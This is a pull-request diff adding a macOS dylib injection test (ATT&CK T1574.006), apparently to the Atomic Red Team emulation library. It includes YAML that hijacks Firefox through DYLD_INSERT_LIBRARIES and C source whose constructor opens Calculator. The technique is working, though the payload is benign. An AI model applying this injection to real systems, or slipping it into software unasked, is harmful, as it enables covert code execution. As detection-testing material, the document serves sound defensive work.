Merge pull request #1989 from RoundBunny/master

Added T1574.006 MacOS Dylib Injection

atomics/T1574.006/T1574.006.yaml

@@ -62,3 +62,37 @@ atomic_tests:
     command: |
       LD_PRELOAD=#{path_to_shared_library} ls
     name: bash
+- name: Dylib Injection via DYLD_INSERT_LIBRARIES
+  description: |
+    injects a dylib that opens calculator via env variable
+  supported_platforms:
+  - macos
+  input_arguments:
+    file_to_inject:
+      description: Path of executable to be injected. Mostly works on non-apple default apps.
+      type: Path
+      default: /Applications/Firefox.app/Contents/MacOS/firefox
+    source_file:
+      description: Path of c source file
+      type: Path
+      default: PathToAtomicsFolder/T1574.006/src/MacOS/T1574.006.c
+    dylib_file:
+      description: Path of dylib file
+      type: Path
+      default: /tmp/T1574006MOS.dylib
+  dependency_executor_name: bash
+  dependencies:
+  - description: |
+      Compile the dylib from (#{source_file}). Destination is #{dylib_file}
+    prereq_command: |
+      gcc -dynamiclib #{source_file} -o #{dylib_file}
+    get_prereq_command: |
+      gcc -dynamiclib #{source_file} -o #{dylib_file}
+  executor:
+    command: |
+      DYLD_INSERT_LIBRARIES=#{dylib_file} #{file_to_inject}
+    cleanup_command: |
+      kill `pgrep Calculator`
+      kill `pgrep firefox`
+    name: bash
+    elevation_required: false

atomics/T1574.006/src/MacOS/T1574.006.c

@@ -0,0 +1,8 @@
+#include <stdio.h>
+#include <stdlib.h>
+int system(const char *command);
+__attribute__((constructor))
+static void customConstructor(int argc, const char **argv)
+{
+system("open -a Calculator.app");
+}